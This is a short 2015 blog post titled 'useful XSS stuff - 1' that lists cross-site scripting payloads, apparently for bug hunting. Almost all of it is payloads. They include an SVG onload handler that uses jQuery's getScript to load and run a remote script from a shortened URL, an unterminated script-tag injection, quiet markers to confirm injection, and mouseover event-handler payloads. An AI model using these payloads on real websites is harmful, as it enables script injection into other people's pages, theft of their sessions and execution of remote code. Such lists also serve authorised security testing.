Sunday, December 27, 2015

useful XSS stuff - 1


SVG injection with jQuery (only works where the page already loads jQuery)
<svg/onload=$.getScript("http://bit.ly/1u47DEP")></svg>

short script injection (leaving the closing tag unterminated works in some browsers)
<script src=//<url></script

add comment marker to body (createTextNode inserts it as visible text; it is not parsed as an HTML comment)
document.getElementsByTagName("body")[0].appendChild(document.createTextNode("<!-- bughunter -->"))

add a hash fragment to the URL (instead of alert - more silent ;) )
document.location += "#bughunter"

picture onmouseover        
<picture onmouseover=alert(1)> <img src="http://bit.ly/ZgzZjs"> </picture>

href link mouseover        
<a href="http://bit.ly/ZgzZjs" onMouseOver=alert('XSS')>bughunter</a>